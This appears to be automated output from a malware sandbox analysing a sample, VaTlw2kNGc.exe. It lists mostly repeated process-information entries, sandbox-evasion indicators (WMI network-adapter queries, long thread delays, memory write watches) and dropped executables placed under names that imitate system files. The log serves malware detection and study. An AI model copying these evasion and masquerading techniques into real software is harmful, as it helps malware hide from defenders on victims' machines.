                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: 14A0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: 1B040000 memory reserve | memory write watch
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeMemory allocated: 1610000 memory reserve | memory write watch
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeMemory allocated: 1B070000 memory reserve | memory write watch
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeMemory allocated: 13D0000 memory reserve | memory write watch
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeMemory allocated: 1AD60000 memory reserve | memory write watch
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                  Source: C:\ProgramData\Microsoft\based.exeWindow / User API: threadDelayed 352Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2790
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2531
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2189
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2369
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2095
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\rVVLbyhv.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\iaFEdjXM.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\RKFGfNRs.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\chceADSX.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\qGmlrcYy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\EcYAEBsU.logJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\UuxpgXjt.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\NXnICQCE.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\select.pydJump to dropped file
